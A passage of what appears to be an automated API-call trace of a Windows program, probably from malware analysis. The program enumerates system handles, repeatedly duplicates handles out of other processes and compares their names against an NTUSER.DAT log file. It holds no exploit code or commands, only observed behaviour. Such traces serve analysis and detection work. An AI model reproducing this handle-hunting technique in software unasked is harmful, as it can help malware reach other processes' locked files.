out: SystemInformation=0x4e4170, ResultLength=0x3fedc0*=0x28024) returned 0xc0000004 [0152.433] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4e4170, Size=0x28024) returned 0x44b0068 [0152.433] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x44b0068, Length=0x28024, ResultLength=0x3fedc0 | out: SystemInformation=0x44b0068, ResultLength=0x3fedc0*=0x28024) returned 0x0 [0152.436] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x10000) returned 0x44d8098 [0152.436] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0152.436] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.436] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.436] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.438] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.439] CloseHandle (hObject=0x670) returned 1 [0152.439] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0152.439] CloseHandle (hObject=0x680) returned 1 [0152.439] CloseHandle (hObject=0x62c) returned 1 [0152.439] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0152.439] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.439] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.440] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.441] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.441] CloseHandle (hObject=0x670) returned 1 [0152.441] CloseHandle (hObject=0x680) returned 1 [0152.442] CloseHandle (hObject=0x62c) returned 1 [0152.442] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0152.442] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.442] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.443] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.443] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.443] CloseHandle (hObject=0x670) returned 1 [0152.443] CloseHandle (hObject=0x680) returned 1 [0152.443] CloseHandle (hObject=0x62c) returned 1 [0152.443] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0152.443] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.444] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.444] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.445] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.445] CloseHandle (hObject=0x670) returned 1 [0152.445] CloseHandle (hObject=0x680) returned 1 [0152.445] CloseHandle (hObject=0x62c) returned 1 [0152.445] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0152.445] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x18, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.445] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.446] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.446] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.446] CloseHandle (hObject=0x670) returned 1 [0152.446] CloseHandle (hObject=0x680) returned 1 [0152.447] CloseHandle (hObject=0x62c) returned 1 [0152.447] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0152.447] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.447] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.447] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.448] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.448] CloseHandle (hObject=0x670) returned 1 [0152.448] CloseHandle (hObject=0x680) returned 1 [0152.448] CloseHandle (hObject=0x62c) returned 1 [0152.448] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0152.448] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x20, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.448] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.449] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.450] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.450] CloseHandle (hObject=0x670) returned 1 [0152.450] CloseHandle (hObject=0x680) returned 1 [0152.450] CloseHandle (hObject=0x62c) returned 1 [0152.450] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0152.450] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x24, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.450] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.451] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.451] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.451] CloseHandle (hObject=0x670) returned 1 [0152.451] CloseHandle (hObject=0x680) returned 1 [0152.451] CloseHandle (hObject=0x62c) returned 1 [0152.451] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0152.451] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x28, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.451] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.452] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.453] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.453] CloseHandle (hObject=0x670) returned 1 [0152.453] CloseHandle (hObject=0x680) returned 1 [0152.453] CloseHandle (hObject=0x62c) returned 1 [0152.453] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x62c [0152.453] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.453] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.454] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.454] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.454] CloseHandle (hObject=0x670) returned 1 [0152.454] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.454] CloseHandle (hObject=0x680) returned 1 [0152.455] CloseHandle (hObject=0x62c) returned 1 [0152.455] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x62c [0152.455] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.455] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.455] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.456] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.456] CloseHandle (hObject=0x670) returned 1 [0152.456] CloseHandle (hObject=0x680) returned 1 [0152.456] CloseHandle (hObject=0x62c) returned 1 [0152.456] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0152.456] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.456] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.457] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.458] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.458] CloseHandle (hObject=0x670) returned 1 [0152.458] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.458] CloseHandle (hObject=0x680) returned 1 [0152.458] CloseHandle (hObject=0x62c) returned 1 [0152.458] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0152.458] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.458] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.459] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.461] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.461] CloseHandle (hObject=0x670) returned 1 [0152.461] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0152.461] CloseHandle (hObject=0x680) returned 1 [0152.461] CloseHandle (hObject=0x62c) returned 1 [0152.461] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0152.461] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.461] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.462] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.462] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.463] CloseHandle (hObject=0x670) returned 1 [0152.463] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0152.463] CloseHandle (hObject=0x680) returned 1 [0152.463] CloseHandle (hObject=0x62c) returned 1 [0152.463] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0152.463] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.463] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.464] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.464] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.464] CloseHandle (hObject=0x670) returned 1 [0152.464] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0152.465] CloseHandle (hObject=0x680) returned 1 [0152.465] CloseHandle (hObject=0x62c) returned 1 [0152.465] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0152.465] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.465] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.465] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.466] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.466] CloseHandle (hObject=0x670) returned 1 [0152.466] CloseHandle (hObject=0x680) returned 1 [0152.466] CloseHandle (hObject=0x62c) returned 1 [0152.466] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0152.466] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.466] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.467] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.468] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.468] CloseHandle (hObject=0x670) returned 1 [0152.468] CloseHandle (hObject=0x680) returned 1 [0152.468] CloseHandle (hObject=0x62c) returned 1 [0152.468] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0152.468] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.468] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.468] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.469] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.469] CloseHandle (hObject=0x670) returned 1 [0152.469] CloseHandle (hObject=0x680) returned 1 [0152.469] CloseHandle (hObject=0x62c) returned 1 [0152.469] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0152.469] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.469] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.470] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.471] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.471] CloseHandle (hObject=0x670) returned 1 [0152.471] _wcsicmp (_Str1="\\CatalogChangeListener-178-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0152.471] CloseHandle (hObject=0x680) returned 1 [0152.471] CloseHandle (hObject=0x62c) returned 1 [0152.471] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0152.471] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.471] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.472] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.472] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.472] CloseHandle (hObject=0x670) returned 1 [0152.472] CloseHandle (hObject=0x680) returned 1 [0152.472] CloseHandle (hObject=0x62c) returned 1 [0152.473] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0152.473] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x150, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.473] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.485] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.486] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.486] CloseHandle (hObject=0x670) returned 1 [0152.486] CloseHandle (hObject=0x680) returned 1 [0152.486] CloseHandle (hObject=0x62c) returned 1 [0152.486] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0152.486] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.486] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.487] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.488] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.488] CloseHandle (hObject=0x670) returned 1 [0152.488] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.488] CloseHandle (hObject=0x680) returned 1 [0152.488] CloseHandle (hObject=0x62c) returned 1 [0152.488] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0152.488] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.488] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.489] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.489] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.489] CloseHandle (hObject=0x670) returned 1 [0152.490] CloseHandle (hObject=0x680) returned 1 [0152.490] CloseHandle (hObject=0x62c) returned 1 [0152.490] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0152.490] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xb8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.490] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.490] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.491] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.491] CloseHandle (hObject=0x670) returned 1 [0152.491] CloseHandle (hObject=0x680) returned 1 [0152.491] CloseHandle (hObject=0x62c) returned 1 [0152.491] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0152.491] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.491] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.492] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.493] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.493] CloseHandle (hObject=0x670) returned 1 [0152.493] CloseHandle (hObject=0x680) returned 1 [0152.493] CloseHandle (hObject=0x62c) returned 1 [0152.493] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0152.493] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.493] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.493] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.494] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.494] CloseHandle (hObject=0x670) returned 1 [0152.494] CloseHandle (hObject=0x680) returned 1 [0152.495] CloseHandle (hObject=0x62c) returned 1 [0152.495] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0152.495] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xe8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.495] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.496] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.496] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.496] CloseHandle (hObject=0x670) returned 1 [0152.496] CloseHandle (hObject=0x680) returned 1 [0152.496] CloseHandle (hObject=0x62c) returned 1 [0152.496] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1ac) returned 0x62c [0152.496] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.497] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.497] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.498] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.498] CloseHandle (hObject=0x670) returned 1 [0152.498] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.498] CloseHandle (hObject=0x680) returned 1 [0152.498] CloseHandle (hObject=0x62c) returned 1 